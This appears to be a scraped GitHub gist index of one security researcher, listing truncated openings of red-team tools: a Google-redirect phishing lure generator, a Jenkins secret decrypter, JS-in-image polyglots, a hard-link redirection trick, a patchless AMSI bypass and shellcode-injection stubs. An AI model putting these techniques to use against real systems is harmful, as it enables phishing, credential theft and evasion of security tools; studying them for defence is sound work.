Dwight Hohnstein djhohnstein

@djhohnstein
djhohnstein / google_lure.py
Created December 1, 2022 04:05 — forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@djhohnstein
djhohnstein / JenkinsDecrypter.py
Last active October 22, 2022 23:23
Decrypt Jenkins secrets with all key material from disk
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
from xml.dom import minidom
from pprint import pprint
@djhohnstein
djhohnstein / FastDoubling.cs
Created July 26, 2022 20:31
FastDoubling - Mod RSA 129
using System;
using System.Numerics; // BigInteger lives in System.Numerics
class GFG{
// Function calculate the N-th fibonacci
// number using fast doubling method
static void FastDoubling(BigInteger n, BigInteger []res)
{
BigInteger a, b, c, d;
BigInteger MOD = new BigInteger ("114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541",10);
@djhohnstein
djhohnstein / pnginator.rb
Created July 26, 2022 20:31
pnginator: pack Javascript into a self-extracting PNG
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <http://matt.west.co.tt/>
# from an original idea by Daeken: http://daeken.com/superpacking-js-demos
@djhohnstein
djhohnstein / gifjs.asm
Created July 26, 2022 20:31
A Valid GIF and JS file
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yasm gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
@djhohnstein
djhohnstein / Update_Notes.md
Created July 26, 2022 20:31
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@djhohnstein
djhohnstein / output example.md
Created July 26, 2022 20:19
Shellcode as Numbers - A different kind of calc
@djhohnstein
djhohnstein / patchless_amsi.h
Created April 18, 2022 15:09 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@djhohnstein
djhohnstein / sc.js
Created February 2, 2022 15:35
DynamicWrapperX - Register Code Example
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
@djhohnstein
djhohnstein / syscall.pl
Created October 27, 2021 18:08 — forked from monoxgas/syscall.pl
Perl syscall/sc injection for MacOS
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
my ($addr, $size, $protect, $flags) = @_;
syscall(197, $addr, $size, $protect, $flags, -1, 0);